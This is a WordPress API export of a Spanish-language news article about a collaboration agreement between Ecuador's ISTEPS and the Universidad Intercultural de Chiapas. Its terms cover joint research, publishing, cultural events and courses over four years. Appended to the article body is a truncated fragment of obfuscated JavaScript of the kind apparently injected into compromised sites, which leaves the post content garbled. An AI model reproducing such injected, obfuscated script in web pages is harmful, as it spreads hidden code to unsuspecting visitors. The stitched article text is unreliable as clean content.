{"id":2942,"date":"2022-06-15T00:31:48","date_gmt":"2022-06-15T00:31:48","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2942"},"modified":"2022-06-15T00:31:49","modified_gmt":"2022-06-15T00:31:49","slug":"firman-convenio-isteps-del-ecuador-y-universidad-intercultural","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2942","title":{"rendered":"Firman convenio ISTEPS del Ecuador y Universidad Intercultural"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-14-at-5.14.11-PM-7-1024x682.jpeg\" alt=\"\" class=\"wp-image-2943\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-14-at-5.14.11-PM-7-1024x682.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-14-at-5.14.11-PM-7-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-14-at-5.14.11-PM-7-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-14-at-5.14.11-PM-7-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-14-at-5.14.11-PM-7.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas. \u2013 El Instituto Superior Tecnol\u00f3gico de Econom\u00eda Social, Popular y Solidaria (ISTEPS), representada por su rector Carlos Andr\u00e9s P\u00e1stor Pazmi\u00f1o, de El Ecuador, y la Universidad Intercultural de Chiapas (UNICH), cuya rectora es Leticia Pons Bonals, firmaron Convenio General de Colaboraci\u00f3n, con la finalidad de realizar acciones de inter\u00e9s y beneficio mutuo, relacionadas con el desarrollo acad\u00e9mico, cient\u00edfico, tecnol\u00f3gico y de vinculaci\u00f3n.<br><br>Durante a firma del convenio, Leticia Pons, rectora de la UNICH, dijo que este convenio busca desarrollar proyectos de investigaci\u00f3n intervenci\u00f3n y vinculaci\u00f3n en \u00e1reas de inter\u00e9s para ambas instituciones, adem\u00e1s de coeditar, publicar y difundir obras, colecciones bibliogr\u00e1ficas, trabajos y productos art\u00edsticos y culturales, as\u00ed como organizar conciertos, muestras y exposiciones de artistas y acad\u00e9micos.<br><br>Este acuerdo, adem\u00e1s busca dise\u00f1ar proyectos de innovaci\u00f3n educativa y para la consolidaci\u00f3n y aseguramiento de la calidad, as\u00ed como programas que promuevan el desarrollo de ambas instituciones, as\u00ed como dise\u00f1ar y organizar cursos, conferencias, simposios, diplomados, programas de formaci\u00f3n y actualizaci\u00f3n, que sean de inter\u00e9s y que reporten un beneficio acad\u00e9mico, cient\u00edfico y cultural entre ambas partes, entre otros.<br><br>Pons Bonals, detall\u00f3 que, para determinar acciones a trav\u00e9s de convenios espec\u00edficos factibles de ejecuci\u00f3n, deber\u00e1n coordinarse para la elaboraci\u00f3n y firma de la misma, emanado del presente instrumento, dando seguimiento para su evaluaci\u00f3n de resultados, adem\u00e1s de la debida ejecuci\u00f3n y cumplimiento del convenio.<br><br>Dicho convenio tiene vigencia a partir de la firma del mismo, y una duraci\u00f3n de 4 a\u00f1os, y si alguien busca dar por terminado, lo deber\u00e1n hacer con dos meses de anticipaci\u00f3n \u201csin perjuicio de las acciones o programas que se est\u00e9n desarrollando\u201d.<br><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas. \u2013 El Instituto Superior Tecnol\u00f3gico de Econom\u00eda Social, Popular y Solidaria (ISTEPS), representada por su rector Carlos Andr\u00e9s P\u00e1stor Pazmi\u00f1o, de El Ecuador, y la Universidad Intercultural de Chiapas (UNICH), cuya rectora es Leticia Pons Bonals, firmaron Convenio General de Colaboraci\u00f3n, con la finalidad de realizar acciones de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2943,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-2942","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2942","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2942"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2942\/revisions"}],"predecessor-version":[{"id":2944,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2942\/revisions\/2944"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2943"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2942"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2942"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2942"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}